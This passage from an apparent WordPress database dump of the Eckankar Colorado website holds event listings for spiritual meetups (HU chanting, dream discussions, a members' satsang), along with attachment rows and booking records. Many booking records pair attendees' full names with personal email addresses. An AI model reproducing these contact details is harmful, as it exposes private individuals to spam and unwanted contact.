difference?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you want to be more in tune with the Divine?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly welcomed to join in this spiritual discussion about the nature of our relationship with the Divine and how you make a difference in this world.</span></p>\r\n<p class=\"\" style=\"margin-bottom: 0px;\"><span style=\"font-size: 14pt;\">A secret of spiritual doctrine is that God learns through you – rather through your experiences as Soul.</span></p>\r\n<span style=\"font-size: 14pt;\">&nbsp;</span>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #23507d; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt;\"><span style=\"color: #666666;\">“ </span>God creates Souls and the many celestial spheres where they may have thousands upon thousands of adventures, and then waits to see what they learn while dashing from here to there. And yes, God did add a freedom-giving but often trouble-making item to the resources of Soul: free will. It would prove to be a flower or a thorn. Man could do as he/she liked but was fully responsible for his/her choices too.</span></p>\r\n<p><span style=\"font-size: 14pt;\">So, you are a spark of God.<span style=\"color: #666666;\">\"</span></span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp,&nbsp;Excerpted from “<em>Those Wonderful ECK Masters</em>” and <em>ECKANKAR Soul Adventure Magazine</em>, Vol. No. 2. (<a href=\"https://www.eckankar.org/eck-soul-adventure-magazine\" target=\"_blank\" rel=\"noopener\">ECK Soul Adventure Magazine</a>)</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">To learn more about ECKANKAR, please visit <a class=\"link\" href=\"https://www.eckankar.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a>. Our local group can be accessed by <a class=\"link\" href=\"https://www.eckankar-colorado.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR In Colorado</a>.</span></p>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/286115235/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'God Learns Through Us\'','','publish','closed','closed','','meetup-onlinegod-learns-through-us','','','2022-05-26 12:29:23','2022-05-26 18:29:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266725',0,'mec-events','',0),(266726,2,'2022-05-26 12:15:28','2022-05-26 18:15:28','','surfing-1','','inherit','closed','closed','','surfing-1','','','2022-05-26 12:15:28','2022-05-26 18:15:28','',266725,'https://eckankar-colorado.org/wp-content/uploads/2022/05/surfing-1.jpg',0,'attachment','image/jpeg',0),(266728,2,'2022-05-26 12:33:29','2022-05-26 18:33:29','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Did you know God learns through you?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you wonder if your life makes a difference?<br>\r\n</span><span style=\"font-size: 16pt;\">Do you want to be more in tune with the Divine?</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly welcomed to join in this spiritual discussion about the nature of our relationship with the Divine and how you make a difference in this world.</span></p>\r\n<p class=\"\" style=\"margin-bottom: 0px;\"><span style=\"font-size: 14pt;\">A secret of spiritual doctrine is that God learns through you – rather through your experiences as Soul.</span></p>\r\n<span style=\"font-size: 14pt;\">&nbsp;</span>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #23507d; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"font-size: 14pt;\"><span style=\"color: #666666;\">“ </span>God creates Souls and the many celestial spheres where they may have thousands upon thousands of adventures, and then waits to see what they learn while dashing from here to there. And yes, God did add a freedom-giving but often trouble-making item to the resources of Soul: free will. It would prove to be a flower or a thorn. Man could do as he/she liked but was fully responsible for his/her choices too.</span></p>\r\n<p><span style=\"font-size: 14pt;\">So, you are a spark of God.<span style=\"color: #666666;\">\"</span></span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp,&nbsp;Excerpted from “<em>Those Wonderful ECK Masters</em>” and <em>ECKANKAR Soul Adventure Magazine</em>, Vol. No. 2. (<a href=\"https://www.eckankar.org/eck-soul-adventure-magazine\" target=\"_blank\" rel=\"noopener\">ECK Soul Adventure Magazine</a>)</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">To learn more about ECKANKAR, please visit <a class=\"link\" href=\"https://www.eckankar.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a>. Our local group can be accessed by <a class=\"link\" href=\"https://www.eckankar-colorado.org\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR In Colorado</a>.</span></p>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/286115244/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'God Learns Through Us\'','','publish','closed','closed','','meetup-onlinegod-learns-through-us-2','','','2022-05-26 12:33:29','2022-05-26 18:33:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266728',0,'mec-events','',0),(266734,15,'2022-05-29 09:47:58','2022-05-29 15:47:58','','CelebrateLife','','inherit','closed','closed','','celebratelife','','','2022-05-29 09:47:58','2022-05-29 15:47:58','',266733,'https://eckankar-colorado.org/wp-content/uploads/2022/05/CelebrateLife.webp',0,'attachment','image/webp',0),(266736,15,'2022-05-29 10:04:43','2022-05-29 16:04:43','','SurfsUp','','inherit','closed','closed','','surfsup','','','2022-05-29 10:04:43','2022-05-29 16:04:43','',266735,'https://eckankar-colorado.org/wp-content/uploads/2022/05/SurfsUp.webp',0,'attachment','image/webp',0),(266740,1000019,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Diane Haddenham - 264haddenh@gmail.com','','publish','closed','closed','','diane-haddenham-264haddenhgmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266740',0,'mec-books','',0),(266742,15,'2022-05-30 08:46:50','2022-05-30 14:46:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like to better understand and learn from your dreams?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember your dreams?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you want to explore the spiritual nature of dreams?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss tips for dream discovery, recovery, and interpretation from a spiritual perspective. Your dream meaning can be disguised using its own unique symbols. You can create your own dream dictionary to learn the meaning of the symbols to you.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>ECK Wisdom on Dreams</em>, “Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about dreams visit&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/dreams\" target=\"_blank\" rel=\"nofollow noopener ugc\">Dreams and Their Spiritual Meaning</a></span></p>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/286239470/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'12 Gifts of Spiritual Living: Dreaming\'','','publish','closed','closed','','meetup-online12-gifts-of-spiritual-living-dreaming','','','2022-05-30 08:46:50','2022-05-30 14:46:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266742',0,'mec-events','',0),(266743,2,'2022-05-30 09:23:23','2022-05-30 15:23:23','','green-tree-field-1','','inherit','closed','closed','','green-tree-field-1','','','2022-05-30 09:23:23','2022-05-30 15:23:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/05/green-tree-field-1.jpg',0,'attachment','image/jpeg',0),(266748,0,'2022-05-30 17:53:19','2022-05-30 23:53:19','','','','publish','closed','closed','','266748','','','2022-05-30 17:53:19','2022-05-30 23:53:19','',0,'https://eckankar-colorado.org/nf_sub/266748/',0,'nf_sub','',0),(266749,0,'2022-05-31 01:41:38','2022-05-31 07:41:38','','','','publish','closed','closed','','266749','','','2022-05-31 01:41:38','2022-05-31 07:41:38','',0,'https://eckankar-colorado.org/nf_sub/266749/',0,'nf_sub','',0),(266750,0,'2022-05-31 01:42:29','2022-05-31 07:42:29','','','','publish','closed','closed','','266750','','','2022-05-31 01:42:29','2022-05-31 07:42:29','',0,'https://eckankar-colorado.org/nf_sub/266750/',0,'nf_sub','',0),(266752,2,'2022-05-31 09:34:35','2022-05-31 15:34:35','','ek-logo-med-blue','','inherit','open','closed','','ek-logo-med-blue-2','','','2022-05-31 09:34:35','2022-05-31 15:34:35','',266686,'https://eckankar-colorado.org/wp-content/uploads/2022/05/ek-logo-med-blue.png',0,'attachment','image/png',0),(266753,2,'2022-05-31 10:14:17','0000-00-00 00:00:00','','Block Preview Page','','draft','closed','closed','','','','','2022-05-31 10:14:17','0000-00-00 00:00:00','',0,'https://eckankar-colorado.org/?page_id=266753',0,'page','',0),(266756,0,'2022-05-31 20:23:05','2022-06-01 02:23:05','','','','publish','closed','closed','','266756','','','2022-05-31 20:23:05','2022-06-01 02:23:05','',0,'https://eckankar-colorado.org/nf_sub/266756/',0,'nf_sub','',0),(266761,2,'2023-10-20 09:43:11','2022-06-01 18:36:28','','Contact Colorado Eckankar','','publish','closed','closed','','contact-colorado-eckankar','','','2023-10-20 09:43:11','2023-10-20 15:43:11','',0,'https://eckankar-colorado.org/?p=266761',10,'nav_menu_item','',0),(266762,0,'2022-06-02 16:17:59','2022-06-02 22:17:59','','','','publish','closed','closed','','266762','','','2022-06-02 16:17:59','2022-06-02 22:17:59','',0,'https://eckankar-colorado.org/nf_sub/266762/',0,'nf_sub','',0),(266763,1000020,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Joanne Milelli - joanna3064@gmail.com','','publish','closed','closed','','joanne-milelli-joanna3064gmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266763',0,'mec-books','',0),(266764,2,'2022-06-04 10:35:14','2022-06-04 16:35:14','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"color: #484848;\"><strong><span style=\"font-size: 18pt;\">- This Event Is Available To Members Of Eckankar -</span><br>\r\n</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join your fellow chelas on Zoom to gain insight from the Mahanta on the topic of “Opening to Greater Love and Acceptance”. This sacred insight can help us recognize that we have even more ECK love to give than is needed in any given situation. </span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: 30px; margin-left: 20px;\"><span style=\"font-size: 14pt;\">When one attends an ECK Satsang, he becomes refined in the presence of others and moves in grace toward becoming an instrument of the Sugmad. He becomes closer to the Mahanta in spirit and they can communicate secretly. The relationship between the two is of a love greater than words can express; it is the highest of any love.</span><br>\r\n<p><span style=\"font-size: 14pt; color: #666666;\">— The<em> Shariyat-Ki-Sugmad</em>, Book One, pp. 224-225<br>\r\n</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The Satsang Intensives will be hour-long experiential events exploring the ECK works. They will include time for discussion and sharing in small groups, spiritual exercises, and contemplation.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">These will be offered quarterly on third Sundays on different topics. No advance preparation or pre-registration is necessary.</span></p>\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #1d5791;\">See the June ECK Newsletter for login information.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Satsang Intensive<br>\'Opening to Greater Love and Acceptance\'','','publish','closed','closed','','satsang-intensiveopening-to-greater-love-and-acceptance','','','2022-06-05 21:34:40','2022-06-06 03:34:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266764',0,'mec-events','',0),(266765,0,'2022-06-04 21:55:12','2022-06-05 03:55:12','','','','publish','closed','closed','','266765','','','2022-06-04 21:55:12','2022-06-05 03:55:12','',0,'https://eckankar-colorado.org/nf_sub/266765/',0,'nf_sub','',0),(266766,2,'2022-06-05 08:35:52','2022-06-05 14:35:52','','green-tree-field-smush-1','','inherit','closed','closed','','green-tree-field-smush-1','','','2022-06-05 08:35:52','2022-06-05 14:35:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/05/green-tree-field-smush-1.jpg',0,'attachment','image/jpeg',0),(266768,1000009,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Lynnzie - lynnzies3@gmail.com','','publish','closed','closed','','lynnzie-lynnzies3gmail-com-2','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266768',0,'mec-books','',0),(266770,1000021,'2027-05-09 10:30:00','2027-05-09 16:30:00','','Christest - choll.03@comcast.net','','publish','closed','closed','','christest-choll-03comcast-net','','','2027-05-09 10:30:00','2027-05-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266770',0,'mec-books','',0),(266773,0,'2022-06-09 17:54:18','2022-06-09 23:54:18','','','','publish','closed','closed','','266773','','','2022-06-09 17:54:18','2022-06-09 23:54:18','',0,'https://eckankar-colorado.org/nf_sub/266773/',0,'nf_sub','',0),(266777,0,'2022-06-10 20:05:43','2022-06-11 02:05:43','','','','publish','closed','closed','','266777','','','2022-06-10 20:05:43','2022-06-11 02:05:43','',0,'https://eckankar-colorado.org/nf_sub/266777/',0,'nf_sub','',0),(266778,1000020,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Joanne Milelli - joanna3064@gmail.com','','publish','closed','closed','','joanne-milelli-joanna3064gmail-com-2','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266778',0,'mec-books','',0),(266779,1000022,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266779',0,'mec-books','',0),(266780,1000014,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Kery  - keanchico@yahoo.com','','publish','closed','closed','','kery-keanchicoyahoo-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266780',0,'mec-books','',0),(266781,1000023,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266781',0,'mec-books','',0),(266782,1000016,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Elizabeth - elizabethstar1@yahoo.com','','publish','closed','closed','','elizabeth-elizabethstar1yahoo-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266782',0,'mec-books','',0),(266783,1000010,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Uche - uchenwamoh@yahoo.com','','publish','closed','closed','','uche-uchenwamohyahoo-com-2','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266783',0,'mec-books','',0),(266784,1000024,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Roger Morandi - rmorandi@comcast.net','','publish','closed','closed','','roger-morandi-rmorandicomcast-net','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266784',0,'mec-books','',0),(266785,1000014,'2022-06-12 10:30:00','2022-06-12 16:30:00','','kery - keanchico@yahoo.com','','publish','closed','closed','','kery-keanchicoyahoo-com-2','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266785',0,'mec-books','',0),(266786,1000025,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Bella Simons - bellasimons1@gmail.com','','publish','closed','closed','','bella-simons-bellasimons1gmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266786',0,'mec-books','',0),(266787,1000026,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Tom Walker - tomw2891@gmail.com','','publish','closed','closed','','tom-walker-tomw2891gmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/tom-walker-tomw2891gmail-com/',0,'mec-books','',0),(266788,1000027,'2022-06-12 10:30:00','2022-06-12 16:30:00','','John Wood - woodjohn185@gmail.com','','publish','closed','closed','','john-wood-woodjohn185gmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/john-wood-woodjohn185gmail-com/',0,'mec-books','',0),(266789,1000012,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Lynn Gardner - lynnie626@gmail.com','','publish','closed','closed','','lynn-gardner-lynnie626gmail-com-2','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/lynn-gardner-lynnie626gmail-com-2/',0,'mec-books','',0),(266790,1000028,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Genesis Brown  - edwardsgenesis21@gmail.com','','publish','closed','closed','','genesis-brown-edwardsgenesis21gmail-com','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/genesis-brown-edwardsgenesis21gmail-com/',0,'mec-books','',0),(266791,1000023,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-2','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/bonnie-greenstreet-bngstreetgmail-com-2/',0,'mec-books','',0),(266792,1000023,'2022-06-12 10:30:00','2022-06-12 16:30:00','','Bonnie Greenstreet - bngstreet@gmail.com','','publish','closed','closed','','bonnie-greenstreet-bngstreetgmail-com-3','','','2022-06-12 10:30:00','2022-06-12 16:30:00','',0,'https://eckankar-colorado.org/mec-books/bonnie-greenstreet-bngstreetgmail-com-3/',0,'mec-books','',0),(266794,1000029,'2022-06-19 11:45:00','2022-06-19 17:45:00','','Rebazar allembe  - hospiceallembe@gmail.com','','publish','closed','closed','','rebazar-allembe-hospiceallembegmail-com','','','2022-06-19 11:45:00','2022-06-19 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266794',0,'mec-books','',0),(266795,1000029,'2022-06-21 19:00:00','2022-06-22 01:00:00','','Rebazar allembe  - hospiceallembe@gmail.com','','publish','closed','closed','','rebazar-allembe-hospiceallembegmail-com-2','','','2022-06-21 19:00:00','2022-06-22 01:00:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266795',0,'mec-books','',0),(266796,1000029,'2022-07-17 11:45:00','2022-07-17 17:45:00','','Rebazar allembe  - hospiceallembe@gmail.com','','publish','closed','closed','','rebazar-allembe-hospiceallembegmail-com-3','','','2022-07-17 11:45:00','2022-07-17 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266796',0,'mec-books','',0),(266797,0,'2022-06-17 20:35:31','2022-06-18 02:35:31','','','','publish','closed','closed','','266797','','','2022-06-17 20:35:31','2022-06-18 02:35:31','',0,'https://eckankar-colorado.org/nf_sub/266797/',0,'nf_sub','',0),(266798,0,'2022-06-18 12:11:37','2022-06-18 18:11:37','','','','publish','closed','closed','','266798','','','2022-06-18 12:11:37','2022-06-18 18:11:37','',0,'https://eckankar-colorado.org/nf_sub/266798/',0,'nf_sub','',0),(266799,1000030,'2022-06-19 11:45:00','2022-06-19 17:45:00','','Marilyn Millar - marilynmillarhu@gmail.com','','publish','closed','closed','','marilyn-millar-marilynmillarhugmail-com','','','2022-06-19 11:45:00','2022-06-19 17:45:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266799',0,'mec-books','',0),(266801,2,'2022-06-20 11:01:27','2022-06-20 17:01:27','<div class=\"color1-background-color bg-background-color tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: center; height: 100%; background-size: cover; background-repeat: no-repeat; background-image: linear-gradient(rgba(255, 255, 255, 0.8), rgba(255, 255, 255, 0.8)), url(\'https://images.unsplash.com/photo-1448697138198-9aa6d0d84bf4?ixlib=rb-0.3.5&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=1600&amp;h=900&amp;fit=crop&amp;s=ea43e85b3b5387ed5413925b03e71d18\');\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2022/06/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw1600h900fitcrops8add7760dade3b2528b5eeb0ddeb7f5e.jpg\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 130px; padding-bottom: 140px;\">\r\n<div class=\"col-md-2 col-sm-1 col-xs-12 col-lg-2\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 col-lg-8\">\r\n<h1 class=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\"><img class=\"alignnone size-full wp-image-83948 aligncenter\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ek-logo-med-blue.png\" alt=\"\" width=\"66\" height=\"65\"></h1>\r\n<h1 class=\"\" style=\"text-align: center; text-transform: uppercase; font-family: \'Raleway\'; font-weight: 600; font-size: 55px; color: #1d5791;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\"><strong>Website Under Maintenance</strong></h1>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"bg-hr-1 bg-hr\" style=\"margin-bottom: 30px; margin-right: auto; margin-left: auto; color: rgba(61, 61, 61, 0.88);\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"text-align: center; font-size: 35px; color: rgba(61, 61, 61, 0.88);\">Our Website is currently undergoing scheduled maintenance.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 38px; color: #1d5791;\">Please check back soon.</p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-1 col-xs-12 col-lg-2\"></div>\r\n</div>\r\n</div>\r\n</div>','Maintenance Mode Web Page Code','','draft','closed','closed','','maintenance-mode-web-page-code','','','2022-06-20 11:12:00','2022-06-20 17:12:00','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=266801',0,'bg_block','',0),(266813,2,'2022-06-21 21:16:28','2022-06-22 03:16:28','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 18pt;\">Experience The Sound of Soul--HU, Sacred Sound, Ancient Mantra</span></p>\r\n<p class=\"mb-4\"><br>\r\n<span style=\"font-size: 14pt;\">-Discover Your Inner Guidance</span><br>\r\n<span style=\"font-size: 14pt;\">-Healing for Body, Mind and Spirit</span><br>\r\n<span style=\"font-size: 14pt;\">-A Higher Form of Creativity</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Experience HU--The Sound of Soul Events offer the opportunity to chant HU, a love song to God; engage in spiritual conversation; and enjoy community. Meet others of like heart who share a desire to explore their own connection with God or Divine Spirit.</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Overview of an Experience the Sound of Soul event:</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">There will be a warm introduction.</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">The facilitator will read an inspiring quote.</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">We will chant HU with love for about 15 - 20 minutes (pronounced like the word hue.)</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">There will be a quiet contemplation time of about 3 to 5 minutes.</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Finally, you\'ll have the opportunity for spiritual conversation in a welcoming and respectful atmosphere to explore your own connection with God or Divine Spirit.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We hope that you will join us for this uplifting event that is sponsored by ECKANKAR, the Path of Spiritual Freedom. It is open to anyone of any religion, culture or walk of life. For more info on the HU, go to: <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">HU, Sacred Sound, Ancient Mantra</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">&nbsp;This event will be outdoor. Bring a chair or blanket to sit on.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/286558594/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Boulder - Experience HU--The Sound of Soul Event<br>In Person','','publish','closed','closed','','meetup-onlinetitle-goes-here-template','','','2022-06-21 21:34:39','2022-06-22 03:34:39','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266813',0,'mec-events','',0),(266815,2,'2022-06-21 18:07:11','2022-06-22 00:07:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<div class=\"break-words\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to experience HU, a divine sound that courses through all of life and through every atom of your body. HU is an ancient name for God, a sacred sound and a carrier of love between Soul and God. It has been sung for thousands of years, and in many places, for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Singing HU acts as a tuning fork, aligning Soul to higher states of love, creativity, healing, and awareness. When sung or chanted with an open heart, it opens the lines of communication to the most sacred part of yourself.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">In this ONLINE event, you will have the opportunity to experience some of the many benefits of singing HU:</span></p>\r\n<ul class=\"\">\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li class=\"mb-4\"><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event will include singing HU for 15 to 20 minutes, a few minutes of quiet contemplation, and discussion groups in Zoom breakout rooms, where you can participate in spiritual conversation with others of like heart.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">What is HU? | HU is the Sound of Soul | ECKANKAR</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul - Online','','publish','closed','closed','','experience-hu-the-sound-of-soul-online-2','','','2022-06-21 18:16:29','2022-06-22 00:16:29','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=266815',0,'mec-events','',0),(266816,2,'2022-06-21 18:04:11','2022-06-22 00:04:11','','hu-water-2','','inherit','closed','closed','','hu-water-2','','','2022-06-21 18:04:11','2022-06-22 00:04:11','',266815,'https://eckankar-colorado.org/wp-content/uploads/2022/06/hu-water-2.jpg',0,'attachment','image/jpeg',0),(266817,1000021,'2022-07-03 10:30:00','2022-07-03 16:30:00','','Test - choll.03@comcast.net','','publish','closed','closed','','test-choll-03comcast-net','','','2022-07-03 10:30:00','2022-07-03 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=266817',0,'mec-books','',0),(266818,2,'2022-06-21 21:15:51','2022-06-22 03:15:51','','sound-of-soul-2','','inherit','closed','closed','','sound-of-soul-2','','','2022-06-21 